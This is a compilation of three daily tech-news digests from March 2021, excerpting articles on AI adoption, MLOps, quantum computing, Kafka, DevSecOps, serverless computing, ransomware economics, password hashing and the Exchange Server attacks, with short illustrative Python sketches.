Daily Tech Digest - March 07, 2021

AI projects yield little business value so far

David Semach, a partner and head of AI and automation at Infosys Consulting for Europe, the Middle East and Africa (EMEA), agrees with the researchers that satisfaction with the technology in a financial sense is often quite low, partly because organisations “are mostly still experimenting” with it. This means it tends to be deployed in pockets rather than widely across the business. “The investment required in AI is significant, but if it’s just done in silos, you don’t gain economies of scale, you can’t take advantage of synergies and you don’t realise the cost benefits, which means it becomes a cost-prohibitive business model in many instances,” says Semach. Another key issue here is the fact that most companies “mistakenly” concentrate on using the software to boost the efficiency of internal processes and operating procedures, rather than for generating new revenue streams. “Where companies struggle is if they focus on process efficiencies and the bottom line because of the level of investment required,” says Semach. “But those that focus on leveraging AI to create new business and top-line growth are starting to see longer-term benefits.” 


How Optimizing MLOps can Revolutionize Enterprise AI

With database deployment, it takes only one line of code to deploy a model. The database-deployment system automatically generates a table and a trigger that embody the model execution environment, so there is no more wrestling with containers. To run inference, all a data scientist has to do is insert feature records into the system-generated predictions table; the system automatically executes a trigger that runs the model on the new records. This also saves time for future retraining, since the prediction table holds all the new examples to add to the training set, keeping predictions continuously up to date with little to no manual code. ... The other major bottleneck in the ML pipeline is the data transformation process: manually transforming data into features and serving those features to the ML model is time-intensive, monotonous work. A feature store is a shareable repository of features built to automate the input, tracking, and governance of data flowing into machine learning models. Feature stores compute and store features, enabling them to be registered, discovered, used, and shared across a company.
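
The trigger-based pattern described above can be sketched in a few lines. This is a minimal illustration using SQLite and a stand-in scoring function, not the actual product's system; the table names and the `predict` rule are invented for the example.

```python
import sqlite3

# Hypothetical "model": in a real system this would invoke a trained model;
# here it is a stand-in threshold rule for illustration.
def predict(x1, x2):
    return 1 if x1 + x2 > 1.0 else 0

conn = sqlite3.connect(":memory:")
conn.create_function("predict", 2, predict)

conn.executescript("""
CREATE TABLE features (id INTEGER PRIMARY KEY, x1 REAL, x2 REAL);
CREATE TABLE predictions (feature_id INTEGER, label INTEGER);

-- The trigger embodies the "model execution environment": every new
-- feature row is scored automatically, with no serving code or container.
CREATE TRIGGER score AFTER INSERT ON features
BEGIN
    INSERT INTO predictions VALUES (NEW.id, predict(NEW.x1, NEW.x2));
END;
""")

conn.execute("INSERT INTO features (x1, x2) VALUES (0.7, 0.6)")
conn.execute("INSERT INTO features (x1, x2) VALUES (0.1, 0.2)")
rows = conn.execute(
    "SELECT label FROM predictions ORDER BY feature_id").fetchall()
print(rows)   # [(1,), (0,)]
```

Note also that the `features` table doubles as the growing training set for the next retraining run, which is the retraining benefit the excerpt mentions.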


How to get started in quantum computing

Unlike binary bits, qubits can exist as a ‘superposition’ of both 1 and 0, resolving one way or the other only when measured. Quantum computing also exploits properties such as entanglement, in which changing the state of one qubit also changes the state of another, even at a distance. Those properties empower quantum computers to solve certain classes of problem more quickly than classical computers. Chemists could, for instance, use quantum computers to speed up the identification of new catalysts through modelling. Yet that prospect remains a distant one. Even the fastest quantum computers today have no more than 100 qubits, and are plagued by random errors. In 2019, Google demonstrated that its 54-qubit quantum computer could solve in minutes a problem that would take a classical machine 10,000 years. But this ‘quantum advantage’ applied only to an extremely narrow situation. Peter Selinger, a mathematician and quantum-computing specialist at Dalhousie University in Halifax, Canada, estimates that computers will need several thousand qubits before they can usefully model chemical systems.
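
The superposition and entanglement mentioned above can be illustrated with a toy state-vector simulation (this is classical simulation of two qubits, not quantum hardware):

```python
import math

# Two qubits as four amplitudes over the basis states |00>, |01>, |10>, |11>.
state = [1.0, 0.0, 0.0, 0.0]          # start in |00>

# A Hadamard gate on qubit 0 puts it in an equal superposition of 0 and 1
# (it mixes the |0x> amplitudes with the |1x> amplitudes).
h = 1 / math.sqrt(2)
state = [h * (state[0] + state[2]), h * (state[1] + state[3]),
         h * (state[0] - state[2]), h * (state[1] - state[3])]

# A CNOT gate (control = qubit 0) entangles the pair: it flips qubit 1
# exactly when qubit 0 is 1, i.e. swaps the |10> and |11> amplitudes.
state = [state[0], state[1], state[3], state[2]]

# Measurement probabilities: only |00> and |11> are ever observed, so
# measuring one qubit fixes the other -- the signature of entanglement.
probs = [round(abs(a) ** 2, 3) for a in state]
print(probs)   # [0.5, 0.0, 0.0, 0.5]
```

The exponential cost of this kind of classical simulation as qubit counts grow is exactly why useful quantum hardware is interesting.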


Non-Invasive Data Governance Q&A

Data Governance can be non-invasive if people are recognized in the role of data steward based on their existing relationship to the data. People define, produce and use data as part of their everyday jobs, and they are automatically stewards if they are held formally accountable for how they define, produce and use that data. The main premise of being non-invasive is that the organization is already governing data in some form; the issue is that it is doing so informally, leading to inefficiency and ineffectiveness in how the data is governed. For example, people who use sensitive data are already expected to protect that data. The NIDG approach assures that these people know how data is classified, and that they follow the appropriate handling procedures for the entire data lifecycle. You are already governing, but you can do it a lot better. We are not going to overwhelm you with new responsibilities that you should already have. ... The easiest answer to that question is that almost everybody looks at governance the way they look at government. People think that data governance has to be difficult, complex and bureaucratic, when the truth is that it does NOT have to be that way. People are already governing and being governed within organizations, but it is being done informally.


Apache Kafka in a Smart City Architecture

A smart city functions alongside various interfaces, data structures, and technologies. Many high-volume data streams must be integrated, correlated, and processed in real-time. Scalability and elastic infrastructure are essential for success. Many data streams contain mission-critical workloads and must offer reliability, zero data loss, and persistence. An event streaming platform based on the Apache Kafka ecosystem provides all these capabilities. ... A smart city requires more than real-time data integration and real-time messaging. Many use cases are only possible if the data is also processed continuously in real-time. That's where Kafka-native stream processing frameworks such as Kafka Streams and ksqlDB come into play. ... The public sector and smart city architectures leverage event streaming for various use cases. The reasons are the same as in all other industries: Kafka provides an open, scalable, elastic infrastructure. Additionally, it is battle-tested and runs in every infrastructure (edge, data center, cloud, bare metal, containers, Kubernetes, fully-managed SaaS such as Confluent Cloud). But event streaming is not the silver bullet for every problem. Therefore, Kafka complements other technologies such as MQTT for edge integration, or a cloud data lake for batch analytics.
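
To make the stream-processing idea concrete, here is a plain-Python sketch of the kind of continuous, per-key aggregation that Kafka Streams or ksqlDB would run over a smart-city event stream. It is not Kafka itself; the event shape and sensor names are hypothetical.

```python
from collections import defaultdict

def traffic_counts(events):
    """Continuously aggregate vehicle counts per sensor.

    In Kafka Streams/ksqlDB terms this is a never-ending aggregation over
    a keyed stream, emitting an updated materialized view per event.
    """
    counts = defaultdict(int)
    for event in events:                 # in Kafka this loop never ends
        counts[event["sensor"]] += event["vehicles"]
        yield dict(counts)               # emit the updated view downstream

stream = [
    {"sensor": "junction-1", "vehicles": 4},
    {"sensor": "junction-2", "vehicles": 7},
    {"sensor": "junction-1", "vehicles": 3},
]
views = list(traffic_counts(stream))
print(views[-1])   # {'junction-1': 7, 'junction-2': 7}
```

In a real deployment the input would be a Kafka topic (fed, for instance, by MQTT at the edge) and the output view would be queryable by downstream city services.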


Remote work: 4 ways to spot a toxic culture

Trust is the fundamental element of a high-performing culture. Especially in a remote workplace, it’s difficult to be a lone wolf and not collaborate on projects. If you notice that your team is avoiding working with someone, look to see if it’s a pattern. Perhaps that individual is “phoning it in” or making too many mistakes, and the team can’t trust their work anymore. You need to address this right away to avoid disappointing the rest of the team. Ask yourself: How much do folks enjoy redoing someone else’s work? Or watching the employee screw up and get away with it? Or questioning why they are working so hard while others aren’t? Worse, your team members may start wondering if they can trust you as a manager if you won’t handle the problem. ... When you hear someone make a statement that may be judgmental, ask the person, “What do you know to be true? What are the facts?” A good way to tell if someone is stating facts or judgments is to apply the “videotape test:” Can what they describe be captured by a video camera? For example, “He was late for the meeting” is a fact and passes the test. In contrast, “He’s lazy” is a judgment and doesn’t pass the test. Be mindful when you’re hearing judgments and try to dig out the facts.


Changing the AI Landscape Through Professionalization

Organizations should work with data architects, business owners and solution architects to develop an AI strategy underpinned by a data strategy and data taxonomy, analyzing the value that their company can and wishes to create. After all, “Establishing a Data Driven culture is the key—and often the biggest challenge—to scaling artificial intelligence across your organization.” While your technology enables the business, your workforce is the essential driving force. It is crucial to democratize data and AI literacy by encouraging skilling, upskilling, and reskilling. People in the organization will need to shift their mindset from experience-based, leadership-driven decision-making to data-driven decision-making, in which employees augment their intuition and judgement with AI algorithms’ recommendations to arrive at better answers than either humans or machines could reach on their own. My recommendation would be to carve out a “System of Knowledge & Learning” as a separate stream in the overall Enterprise Architecture, alongside Systems of Record, Systems of Engagement & Experience, and Systems of Innovation & Insight. AI and data literacy will also help increase employee satisfaction, because the organization is allowing its workforce to identify new areas for professional development.


How Skyworks embraced self-service IT

At Skyworks, the democratization of IT is all about giving our business users access to technology—application development, analytics, and automation—with the IT organization providing oversight, but not delivery. IT provides oversight in the form of security standards and release and change management strategies, which gives our business users both the freedom to improve their own productivity and the assurance that they are not reinventing the automation wheel across multiple sites. COVID has been a real catalyst for this new operating model. As in most companies, when COVID hit, we started to see a flurry of requests for new automation and better analytics in supply chain and demand management. Luckily for us, we had already started to put the foundation in place for our data organization, so we were able to capitalize on this opportunity to move into self-service. ... For IT to shift from being order-takers to enablers of a self-service culture, we created a new role: the IT business partner. We have an IT business partner for every function; these people participate in all of the meetings of their dedicated function, and rather than asking “What new tool do you need?”, they ask, “What is the problem you are trying to solve?” IT used to sit at the execution table; with our new IT business partners, we now sit at the ideation table.


12 Service Level Agreement (SLA) best practices for IT leaders

Smart IT leaders understand that negotiation is not concession. It’s critical to reach a mutually agreed pathway to providing the service that the client expects, says Vamsi Alla, CTO at Think Power Solutions. In particular, IT leaders should work with providers on penalties and opt-out clauses. “A good SLA has provisions for mutually agreed-upon financial and non-financial penalties when service agreements are not met,” Alla says. Without that, an SLA is worth little more than the paper on which it’s written. ... “The most common mistake is to include performance metrics that are not properly reviewed and are unattainable,” Alla says. “This is usually done because the client has asked for it and the service provider is too willing to oblige. This may cause the contract to come through, but the road to execution becomes bumpy as the metrics can’t be achieved.” The level of service requested directly impacts the price of the service. “It’s important to understand what a reasonable level of performance is in the market so as not to over-spec expectations,” Fong of Everest Group says.


Security starts with architecture

Security must be viewed as an organizational value that exists in all aspects of its operation and in every part of the product development life cycle. That includes planning, design, development, testing and quality assurance, build management, release cycles, the delivery and deployment process, and ongoing maintenance. The new approach has to be both strategic and tactical. In strategic terms, every potential area of vulnerability has to be conceptually addressed through holistic architectural design. During the design process, tactical measures have to be implemented in each layer of the technology ecosystem (applications, data, infrastructure, data transfer, and information exchange). Ultimately, the responsibility will fall to the development and DevOps teams to build secure systems and fix security problems; the strategic and tactical approach outlined here will allow them to handle security successfully. Security policies must be applied throughout the product development life cycle, right where code is being written, data systems are being developed, and infrastructure is being set up.



Quote for the day:

"If you really want the key to success, start by doing the opposite of what everyone else is doing." -- Brad Szollose

Daily Tech Digest - March 06, 2021

From Agile to DevOps to DevSecOps: The Next Evolution

While Agile and DevOps share common goals, they have not always agreed on how to achieve those goals. DevOps differs in many respects from Agile but, at its best, applies Agile methodologies, along with lean manufacturing principles, to speed up software deployment. One area of particular tension between Agile and DevOps is that the latter relies heavily on tools, in particular for the automation of testing and deployment processes. But DevOps can overcome the resistance of Agile developers to tool usage simply by applying Agile principles themselves. Effectively, DevOps proponents must convince Agile teams that dogmatic adherence to the underlying principles of Agile is actually inconsistent with Agile in the first place. Ironically, Agile developers who insist that changing the process is always bad actually violate Agile principles by refusing to acknowledge the benefits offered through change, itself a core Agile principle. The challenge is to have the Agile development teams trust in the automation efforts of DevOps, while at the same time encouraging the DevOps team to consider the business goals of deployment rather than pursuing speed of deployment for its own sake.


Geoff Hinton’s Latest Idea Has The Potential To Break New Ground In Computer Vision

According to Dr. Hinton, the obvious way to represent the part-whole hierarchy is by combining dynamically created graphs with neural network learning techniques. But if the whole computer is a neural network, he explained, it is unclear how to represent part-whole hierarchies that differ for every image while keeping the structure of the neural net identical for all images. Capsule networks, introduced by Dr. Hinton a couple of years ago, offer a solution: a group of neurons, called a capsule, is set aside for each possible type of object or part in each region of the image. However, the problem with capsules is that they use a mixture to model the set of possible parts, so the computer will have a hard time answering questions like “Is the headlight different from the tyres?” (more on this example in the next section). The recent work on neural fields offers a simple way to represent values such as the depth or intensity of an image: a neural network takes as input a code vector representing the image, along with an image location, and outputs the predicted value at that location.
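
The neural-field idea in the last sentence can be sketched directly: a small network maps (image code vector, location) to a predicted value. This toy version uses random, untrained weights purely to show the interface; a real neural field would be trained end to end, and the code vector and layer sizes here are invented.

```python
import math
import random

random.seed(0)

def neural_field(code, x, y, w1, w2):
    """Toy MLP: (per-image code vector, continuous location) -> value."""
    inputs = code + [x, y]
    hidden = [math.tanh(sum(w * v for w, v in zip(row, inputs)))
              for row in w1]
    return sum(w * h for w, h in zip(w2, hidden))

code = [0.2, -0.5, 0.1]   # hypothetical code vector representing one image

# Random weights for a 5-input, 8-hidden-unit, 1-output network.
w1 = [[random.uniform(-1, 1) for _ in range(5)] for _ in range(8)]
w2 = [random.uniform(-1, 1) for _ in range(8)]

# The field can be queried at any continuous location -- no pixel grid.
value = neural_field(code, 0.25, 0.75, w1, w2)
print(value)
```

The key property is that the same fixed network structure serves every image; only the code vector changes per image, which is what makes the representation attractive for the part-whole problem described above.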


Addressing Security Throughout the Infrastructure DevOps Lifecycle

Keep in mind that developer-first security doesn’t preclude “traditional” cloud security methods — namely monitoring running cloud resources for security and compliance misconfigurations. First of all, unless you’ve achieved 100% parity between IaC and the cloud (unlikely), runtime scanning is essential for complete coverage. You probably still have teams or parts of your environment — maybe legacy resources — that are still being manually provisioned via legacy systems or directly in your console and so need to be continuously monitored. Even if you are mostly covered by IaC, humans make mistakes and SRE emergencies are bound to happen. We recently wrote about the importance of cloud drift detection to catch manual changes that result in unintentional deltas between code configuration and running cloud resources. Insight into those resources in production is essential to determine those potentially risky gaps. Runtime scanning also has some advantages. Because it follows the actual states of configurations, it’s the only viable way of evaluating configuration changes over time when managing configuration in multiple methods. Relying solely on build-time findings without attributing them to actual configuration states in runtime could result in configuration clashes.
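
The drift-detection idea reduces to diffing declared (IaC) configuration against what is actually running. A minimal sketch, with hypothetical resource names and attributes:

```python
def detect_drift(declared, running):
    """Report deltas between IaC-declared config and live cloud state."""
    drift = {}
    for resource, desired in declared.items():
        actual = running.get(resource)
        if actual != desired:
            drift[resource] = {"declared": desired, "running": actual}
    # Resources created manually, outside IaC, count as drift too.
    for resource in running.keys() - declared.keys():
        drift[resource] = {"declared": None, "running": running[resource]}
    return drift

declared = {"s3/logs": {"encryption": "aes256", "public": False}}
running = {
    "s3/logs": {"encryption": "aes256", "public": True},  # manual change
    "s3/tmp": {"public": True},                           # unmanaged resource
}
report = detect_drift(declared, running)
print(sorted(report))   # ['s3/logs', 's3/tmp']
```

Real drift detectors work from provider APIs and state files rather than in-memory dicts, but the core comparison is the same: runtime state is the source of truth, and build-time findings are attributed back to it.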


Privacy breaches in digital transactions: Examination under Competition Law or Data Protection Law?

As long as the search engines’ search data is kept secret, no rival, would-be rival, or new entrant will have access to this critical ‘raw material’ for search innovation. Further, when transactions take place in the digital economy, firms generally tend to collect personal as well as non-personal data of users in exchange for the services provided. While it can be argued that personal data is probably collected with the user’s consent, the collection of non-personal data usually happens without the consent or knowledge of consumers. Data is further compromised when businesses that hold large amounts of data merge or amalgamate, and when dominant firms abuse their market position and resort to unethical practices. Traditional Competition Law analysis focuses largely on ‘pricing models’, i.e., the methods used by business players to determine the price of their goods or services; user data forms part of the ‘non-pricing model’. With the Competition Act, 2002 undergoing a number of changes owing to technological developments, there is a possibility that non-pricing models will also be considered under the ambit of the Act.


GraphQL: Making Sense of Enterprise Microservices for the UI

GraphQL has become an important tool for enterprises looking for a way to expose services via connected data graphs. These graph-oriented ways of thinking offer new advantages to partners and customers looking to consume data in a standardized way. Apart from the external consumption benefits, using GraphQL at Adobe has offered our UI engineering teams a way to grapple with the challenges of an increasingly complicated world of distributed systems. Adobe Experience Platform itself offers dozens of microservices to its customers, and our engineering teams also rely on a fleet of internal microservices for things like secret management, authentication, and authorization. Breaking services into smaller components in a service-oriented architecture brings a lot of benefits to our teams, but some drawbacks need to be mitigated to realize those benefits: more layers mean more complexity, and more services mean more communication. GraphQL has been a key component for the Adobe Experience Platform user experience engineering team: one that allows us to embrace the advantages of SOA while helping us navigate the complexities of microservice architecture.
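
The pattern GraphQL enables for a UI team can be sketched without a GraphQL server at all: one request is resolved by fanning out to several microservices, and the client gets back exactly the fields it asked for. The services and fields below are invented stubs, not Adobe's APIs.

```python
# Hypothetical microservice stubs; in production these would be HTTP calls.
def user_service(user_id):
    return {"id": user_id, "name": "Ada", "email": "ada@example.com"}

def orders_service(user_id):
    return [{"id": 1, "total": 42.0}, {"id": 2, "total": 13.5}]

# Resolver table: each queryable field knows which service supplies it.
RESOLVERS = {
    "name": lambda uid: user_service(uid)["name"],
    "orders": lambda uid: [o["id"] for o in orders_service(uid)],
}

def resolve(user_id, requested_fields):
    """One round trip for the UI; the service fan-out happens server-side."""
    return {field: RESOLVERS[field](user_id) for field in requested_fields}

result = resolve(7, ["name", "orders"])
print(result)   # {'name': 'Ada', 'orders': [1, 2]}
```

A real GraphQL gateway adds a typed schema, query parsing, and batching on top, but the resolver-per-field structure is the essence of how it hides microservice complexity from the UI.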


Serverless Functions for Microservices? Probably Yes, but Stay Flexible to Change

When serverless functions are idle, they cost nothing (the “pay per use” model). If a serverless function is called by 10 clients at the same time, 10 instances of it are spun up almost immediately (at least in most cases). The entire provisioning of infrastructure, its management, high availability (at least up to a certain level) and scaling (from 0 to the limits defined by the client) are provided out of the box by teams of specialists working behind the scenes. Serverless functions provide elasticity on steroids and allow you to focus on what is differentiating for your business. ... A “new service” needs to go to market fast, with the lowest possible upfront investment, and needs to be a “good service” from the start. When we want to launch a new service, a FaaS model is likely the best choice. Serverless functions can be set up fast and minimise the work for infrastructure. Their “pay per use” model means no upfront investment, and their scaling capabilities provide good, consistent response times under different load conditions. If, after some time, the load becomes more stable and predictable, then the story can change, and a more traditional model based on dedicated resources, whether Kubernetes clusters or VMs, can become more convenient than FaaS.
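
The scale-from-zero behaviour described above can be mimicked in a toy simulation. This is a sketch of the FaaS model, not any provider's API; the handler shape and platform class are invented.

```python
def handler(event):
    """A FaaS-style function: stateless, invoked once per request."""
    return {"status": 200, "body": f"hello {event['name']}"}

class ToyPlatform:
    """Simulates pay-per-use scaling: instances exist only during requests."""

    def __init__(self):
        self.instances = 0            # idle means zero instances, zero cost

    def invoke(self, events):
        # One instance per concurrent request, spun up on demand.
        self.instances = len(events)
        results = [handler(e) for e in events]
        self.instances = 0            # scale back to zero when idle
        return results

platform = ToyPlatform()
out = platform.invoke([{"name": "a"}, {"name": "b"}])
print(out[0]["body"], platform.instances)   # hello a 0
```

The trade-off in the excerpt falls out of this model: under steady, predictable load you pay per invocation for capacity you would use constantly anyway, at which point dedicated resources can become cheaper.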


Unconventional Sentiment Analysis: BERT vs. Catboost

Sentiment analysis is a Natural Language Processing (NLP) technique used to determine if data is positive, negative, or neutral. Sentiment analysis is fundamental, as it helps to understand the emotional tones within language. This, in turn, helps to automatically sort the opinions behind reviews, social media discussions, etc., allowing you to make faster, more accurate decisions. Although sentiment analysis has become extremely popular in recent times, work on it has been progressing since the early 2000s. Traditional machine learning methods such as Naive Bayes, Logistic Regression, and Support Vector Machines (SVMs) are widely used for large-scale sentiment analysis because they scale well. Deep learning (DL) techniques have now been proven to provide better accuracy for various NLP tasks, including sentiment analysis; however, they tend to be slower and more expensive to train and use. ... CatBoost is a high-performance, open-source library for gradient boosting on decision trees. From release 0.19.1, it supports text features for classification on GPU out of the box. The main advantage is that CatBoost can include categorical features and text features in your data without additional preprocessing.
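
To make the "traditional" end of the spectrum concrete, here is a from-scratch Naive Bayes sentiment classifier in plain Python. The tiny training set is invented for illustration; real systems train on thousands of labelled examples (and a library like scikit-learn or CatBoost would be used in practice).

```python
import math
from collections import Counter

train = [("great product love it", "pos"),
         ("terrible waste of money", "neg"),
         ("really love this", "pos"),
         ("awful terrible quality", "neg")]

# Per-class word counts learned from the training data.
counts = {"pos": Counter(), "neg": Counter()}
for text, label in train:
    counts[label].update(text.split())
vocab = {w for c in counts.values() for w in c}

def classify(text):
    scores = {}
    for label, c in counts.items():
        total = sum(c.values())
        # Sum of log-probabilities with add-one (Laplace) smoothing,
        # so unseen words don't zero out a class.
        scores[label] = sum(math.log((c[w] + 1) / (total + len(vocab)))
                            for w in text.split())
    return max(scores, key=scores.get)

print(classify("love the quality"))    # pos
print(classify("terrible product"))    # neg
```

This is the kind of model that scales cheaply; the DL and CatBoost approaches the article compares trade more compute for better handling of word order and context.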


How to gain advanced cyber resilience and recovery across the IT ops and SecOps divide

The legacy IT world was all about protecting what they know about, and it’s hard to change. The new world is all about automation, right? It impacts everything we want to do and everything that we can do. Why wouldn’t we try to make our jobs as simple and easy as possible? When I first got into IT, one of my friends told me that the easiest thing you can do is script everything that you possibly can, just to make your life simpler. Nowadays, with the way digital workflows are going, it’s not just automating the simple things -- now we’re able to easily automate the complex ones, too. We’re making it so anybody can jump in and get this automation going as quickly as possible. ... The security challenge has changed dramatically. What’s the impact of the Internet of Things (IoT) and edge computing? We’ve essentially created a much larger attack surface area, right? What’s changed in a very positive way is that this expanded surface has driven automation and the capability to not only secure workflows but to collaborate on those workflows. We have to have the capability to quickly detect, respond, and remediate.


Compute to data: using blockchain to decentralize data science and AI with the Ocean Protocol

If algorithms run where the data is, then this means how fast they will run depends on the resources available at the host. So the time needed to train algorithms that way may be longer compared to the centralized scenario, factoring in the overhead of communications and crypto. In a typical scenario, compute needs move from client side to data host side, said McConaghy: "Compute needs don't get higher or lower, they simply get moved. Ocean Compute-to-Data supports Kubernetes, which allows massive scale-up of compute if needed. There's no degradation of compute efficiency if it's on the host data side. There's a bonus: the bandwidth cost is lower, since only the final model has to be sent over the wire, rather than the whole dataset. There's another flow where Ocean Compute-to-Data is used to compute anonymized data. For example using Differential Privacy, or Decoupled Hashing. Then that anonymized data would be passed to the client side for model building there. In this case most of the compute is client-side, and bandwidth usage is higher because the (anonymized) dataset is sent over the wire. Ocean Compute-to-Data is flexible enough to accommodate all these scenarios".
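
The compute-to-data flow McConaghy describes can be sketched in a few lines: the algorithm travels to the data host, and only the (small) trained model crosses the wire. All names here are illustrative, not Ocean Protocol APIs, and the "model" is a deliberately trivial statistic.

```python
class DataHost:
    """Holds a sensitive dataset that never leaves the host."""

    def __init__(self, dataset):
        self._dataset = dataset

    def run(self, train_fn):
        # The client's algorithm executes where the data lives; only the
        # returned result (the model) is sent back over the wire.
        return train_fn(self._dataset)

def train_mean_model(rows):
    """Toy 'model': the mean of a sensitive numeric column."""
    values = [r["income"] for r in rows]
    return {"mean_income": sum(values) / len(values)}

host = DataHost([{"income": 40}, {"income": 60}, {"income": 50}])
model = host.run(train_mean_model)
print(model)   # {'mean_income': 50.0}
```

The bandwidth bonus mentioned in the excerpt is visible here: the wire carries one small dict instead of the whole dataset, and the raw rows are never exposed to the client.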


Exchange Server Attacks Spread After Disclosure of Flaws

Beyond the U.S. federal government, the impact of the vulnerabilities continues to grow - and not just among the targeted sectors named by Microsoft. The company says those groups include infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and nongovernment organizations. Volexity, which contributed research for the vulnerability findings, first noticed exploitation activity against its customers around Jan. 6. That activity has suddenly ticked up now that the vulnerabilities are public, says Adair, CEO and founder of the firm. "The exploit already looks like it has spread to multiple Chinese APT groups who have become rather aggressive and noisy - quite a marked change from how it started with what we were seeing," he says. Threat detection company Huntress says it has seen compromises of unpatched Exchange servers in small hotels, one ice cream company, a kitchen appliance manufacturer and what it terms "multiple senior citizen communities." "We have also witnessed many city and county government victims, healthcare providers, banks/financial institutions and several residential electricity providers," writes John Hammond, a senior threat researcher at Huntress.



Quote for the day:

"Leadership development is a lifetime journey, not a quick trip." -- John Maxwell

Daily Tech Digest - March 05, 2021

Do Disaster Recovery Sites Actually Work?

Having the right resources available during a crisis is crucial. While internal IT teams perform disaster drills and claim they are able to run operations from the remote site, the fact is that new discoveries come to the fore when a disaster strikes, and the top management team is usually oblivious to these issues. These so-called drills are often just a farce put on for external and internal auditors, who seldom get to the core issues that may have occurred during the drill. Most auditor reports are checklists, and they are happy to tick them off and present a rosy picture to management. It is important to remember that NSE’s press release also said that it did not invoke the disaster recovery site based on management consultations. So what actually is a disaster recovery site? In layman’s terms, it is an alternate site (within the same city or in another city) that is capable of running all the operations of the primary site. The genesis of a disaster recovery site is the business continuity policy (BCP). This document lists all IT systems that hold the data of an organisation, their dependencies on other systems, and all the elements necessary to run them.


We’ll never have true AI without first understanding the brain

The vast majority of AI researchers don’t really embrace the idea that the brain is important. I mean, yes, people figured out neural networks a while ago, and they’re kind of inspired by the brain. But most people aren’t trying to replicate the brain. It’s just whatever works, works. And today’s neural networks are working well enough. And most people in AI have very little understanding of neuroscience. It’s not surprising, because it’s really hard. It’s not something you just sit down and spend a couple of days reading about. Neuroscience itself has been struggling to understand what the hell’s going on in the brain. But one of the big goals of writing this book was to start a conversation about intelligence that we’re not having. I mean, my ideal dream is that every AI lab in the world reads this book and starts discussing these ideas. Do we accept them? Do we disagree? That hasn’t really been possible before. ... An AI that can detect cancer cells is great. But is that intelligence? No. In the book I use the example of robots on Mars building a habitat for humans. Try to imagine what kind of AI is required to do that. Is that possible? It’s totally possible.


Why paying off ransomware gangs is not a good idea

So what is the alternative? Insurers, especially in the US, urge their clients to quickly and quietly pay the ransom to minimise the damage of disruption. Then insurers allow the company to claim back the ransom payment on their insurance and raise their premiums for the following year. This payment is usually handled discreetly by a broker. In essence, the ransomware ecosystem functions like a protection racket, effectively supported by insurers who are set to pocket higher premiums as attacks continue. Aside from the moral objections we might have to routinely paying money to criminals, this practice causes two important practical problems. First, it encourages complacency in cybersecurity. This complacency was best exemplified when a hacked company paid a ransom, but never bothered to investigate how the hackers had breached their system. The company was promptly ransomed again, by the same group using the very same breach, just two weeks later. Second, some ransomware gangs invest their ill-gotten gains into the research and development of better cyber-tools. Many cybersecurity researchers are concerned about the increasing sophistication of the malware used by leading cybercrime groups such as REvil or Ryuk, which are both thought to be based in Russia.


Credential exposure trends: You need a better password

The data recovered by SpyCloud researchers includes more than 4.6 billion pieces of personally identifiable information (PII), including names, addresses, birthdates, job titles, social media URLs and nearly 1.3 billion phone numbers. Criminals use PII to create fake accounts or steal someone else’s identity and then apply for lines of credit, intercept tax refunds, drain bank accounts and more. With as little as one or two pieces of PII, they can compromise a person’s identity. Despite years of advice about the importance of strong passwords, people inevitably end up reusing or recycling the same credentials for multiple sites. Outdated password complexity requirements have complicated the issue by providing people with a false sense of security when they recycle a favorite password with a few simple changes, like capitalizing the first letter and adding a 1 or ! at the end. Industry standards call for organizations to convert plaintext passwords into hashes so if they are breached, criminals can’t easily access the passwords themselves. But some hashing algorithms are computationally harder to crack than others. Unfortunately, even the strongest hashing algorithm means little when users make weak or common password choices.
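
The hashing practice described above looks roughly like this in code: a deliberately slow key-derivation function (here PBKDF2 from Python's standard library) with a random per-user salt, so that cracking leaked hashes is expensive even for common passwords. The iteration count is an illustrative choice, not a universal standard.

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=200_000):
    """Derive a storable hash; a fresh random salt defeats rainbow tables."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify(password, salt, expected):
    _, digest = hash_password(password, salt)
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(digest, expected)

salt, stored = hash_password("correct horse battery staple")
print(verify("correct horse battery staple", salt, stored))  # True
print(verify("Password1!", salt, stored))                    # False
```

As the article notes, though, even the strongest algorithm only slows an attacker down when the underlying password is weak or reused, which is why unique passwords (and a password manager) matter more than clever complexity rules.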


The office of the future is about people not places

Experts suggest the future of employment will be a hybrid mix of office- and home-working. As many as 90% of HR leaders believe employees will carry on working remotely in the post-COVID age, says tech analyst Gartner. That shift to hybrid working is something that resonates with Paul Coby, CIO at global science and chemicals company Johnson Matthey, whose guess is that people in the future will split their time between working from home and going into the office. What that means for many of us is that the traditional nine-to-five working day at the corporate HQ isn't coming back. "It seems to me that sitting in an office doing emails doesn't seem like a great use of offices or an individual's time," says Coby. Other experts agree. Researcher CCS Insight predicts more than half of all office-based employees will still work mainly remotely through 2022. IoD research, meanwhile, suggests more than half of business leaders plan on reducing their long-term use of workplaces, with more than one in five reporting use will be significantly lower. The office that many of us knew – with its command-and-control leadership styles – is probably gone forever. Get it right, and managers could change how we all work for the better. But quite how business leaders will organise and manage the hybrid workplace of the future is still very much up for debate right now.


Why global power grids are still vulnerable to cyber attacks

“Power grids are getting increasingly vulnerable because of digitalization and the use of more smart applications,” said Daine Loh, a Singapore-based power and renewables analyst at Fitch Solutions. It’s a threat highlighted in an initial probe in India that found an October blackout in Mumbai may have been caused by cyber sabotage. That outage impacted stock markets, trains and thousands of households in the nation’s financial hub. The disruptive potential of grid failures — as seen in Texas last month due to a sudden deep freeze — makes the sector a key target, particularly for state-based hostile actors. Over the past four decades, power plants and substations have been moving from manual to automatic controls, and are increasingly being connected to public and private networks for remote access, leaving them exposed to attacks. Producers and distributors have also often been reluctant to spend on protecting themselves against low-probability attacks. “India’s power system is in urgent need of proper cybersecurity systems,” said Reji Kumar Pillai, president of India Smart Grid Forum, a think-tank backed by the federal power ministry that advises governments, regulators and utilities.


Version 2 of Google’s Flutter toolkit adds support for desktop and web apps

